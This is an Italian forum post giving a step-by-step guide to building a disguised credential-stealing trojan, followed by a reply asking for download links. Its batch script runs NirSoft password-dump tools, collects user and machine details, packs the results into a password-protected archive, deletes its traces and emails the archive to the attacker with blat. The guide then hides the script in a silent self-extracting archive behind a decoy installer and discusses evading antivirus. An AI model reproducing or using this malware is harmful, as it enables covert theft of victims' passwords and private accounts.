• Regolamento Macrocategoria DEV
    Prima di aprire un topic nella Macrocategoria DEV, è bene leggerne il suo regolamento. Sei un'azienda o un hosting/provider? Qui sono anche contenute informazioni per collaborare con Sciax2 ed ottenere l'accredito nella nostra community!

[guida] fake login in .exe

ciro.10

Utente Medio
Autore del topic
21 Aprile 2008
235
46
Miglior risposta
0
la fonte è di haking

Occorrente:
Quick Batch File Compiler (per trasformare il bat in un exe silenzioso..lo ho uppato io)
Blat (è un programmino che manda mail da riga di comando...vi serve solo l'exe)
Rar.exe si può anche prendere dalla cartella di winrar..ma posto quello che ho usato io che sicuro funziona
Programmi della nirsoft (scegliete voi quelle che vi piacciono per ognuno dovrete aggiungere una riga nel bat, nel mio codice già ne ho compresi un bel pò)
Winrar (credo che lo abbiate che cakkio nn mi fate mettere i link per ogni scemenza XD)

INIZIAMO:
preparate una cartella di lavoro e lì dentro dovran esserci solo file .exe e il bat (che diventerà un exe)

create un bat (chiamatelo lancia.bat ad esempio) con il seguente codice
CODICE
@mspass.exe /sverhtml mspass.html
@VNCPassView.exe /sverhtml VNCpassView.html
@mailpv.exe /sverhtml mailpv.html
@netpass.exe /sverhtml netpass.html
@iepv.exe /sverhtml iepv.html
@WirelessKeyView.exe /sverhtml WirelessKeyView.html
@dialupass.exe /sverhtml dialupass.html
@LSASecretsView.exe /sverhtml LSASecretsView.html
@pspv.exe /shtml pspv.html
echo COMPUTERNAME = %COMPUTERNAME% > log.txt
echo USERNAME = %*USERNAME% >> log.txt
echo USERDOMAIN = %*USERDOMAIN% >> log.txt
echo USERPROFILE = %*USERPROFILE% >> log.txt
echo. >> log.txt
echo Oggi e’ %DATE% e sono le %*TIME% >> log.txt
rar.exe a -pciao File.rar *.html log.txt > nul
del /q *.*
blat -install out.alice.it bella@alice.it
cls
blat file.rar -to VOSTRA@MAIL.IT -attach File.rar
cls
@setup.exe
@del /q *.*




adesso una volta creato il bat dovrete convertirlo in un exe in ghost mode cosi a schermo non si vede niente
dopo aver creato il nostro exe GHOST ci basta solo mettere nella cartella di lavoro i file per far lavorare il tutto: copiate il rar.exe insieme al lancia.exe (il nostro bat appena convertito)
dopo metteteci dentro gli exe dei programmi della nirsoft
e infine per camuffare ( :shifty: ) tutta l'operazione mettete l'istallazione di un prog rinominato in setup.exe sempre insieme a tutti gli altri exe

PARTE FINALE creazione del nostro autoestraente:
allora il primo passo da fare è comprimere tutti gli exe che sono nella nostra cartella in un file rar, mi raccomando dovete comprimere tutti I FILE in un rar NON COMPRIMETE LA CARTELLA (cioè selezionare tutti gli exe e fare aggiungi ad un archivio)

fatto questo clickare 2 volte sull'arkivio appena creato in modo ke si apra winrar sopra a destra clickate su autoestraente e nella finestra che si aprirà in "opzioni avanzate del modulo auto-estrante" questo punto mettete un percorso di estrazione (prima voce) io ad esempio ho messo:
C:\Documents and Settings\%*USERNAME%\Impostazioni locali\hidenfile
poi più sotto c'è la riga esegui dopo l'estrazione, ebbene lì scrivete il nome dell'exe che crea il tutto ovvero lancia.exe
dopo spostatevi nella scheda modalità e impostate "Nascondi Tutto" e più sotto "sovrascrivi tutti i file già esistenti", se volete potete impostare un'icona all'archivio (insieme a quick batch compiler che ho postato c'è anche un pack di icone). dopo di questo vi cosiglio di ritornare nella scheda generale e clickare su "salva la configurazione corrente come prdefinita" in modo da non immettere sempre le stesse cose ad ogni autoestraente che creerete.....FATTO QUESTO AVETE FINITO!! date l'ok e verrà creato l'archivio autoestraente. :B):

quando ci clikkerete sopra a schermo nn si vedrà niente ma partirà solo l'istallazione del programma "camuffatore" intanto se tutto è andato bene dovreste trovare in pochi secondi sulla vostra mail una lettere da parte di "bella@alice.it" (non mi chiedete se lo potete cambiare perchè non lo sò io ho rimasto questo :blink: ) con un archivio allegato cuoi dentro c'è un log e tutti file html che corrispondono alle password scovate dai vari programmi (per chi non lo ha capito dal bat la password dell'archivio è "ciao")

ricordatevi gli antivirus...per adessoio ho provato con:
nod32: tutti i programmi non vengono rilevati essendo strumenti di hacking
avast: rileva solo dialup password
norton: blocca il funzionamento di tutto

si potrebbe mettere, volendo, all'inizio del bat delle stringhe ke disattivano gli antivirus....ma poi potrebbe essere sgamato il tutto

Alla prossima ;)

fonte hacking
 
Scusa ma non riesco a trovare i link per scaricare i programmi che servono per questo fake login... Puoi cortesemente dirmi i link per il download?

Grazie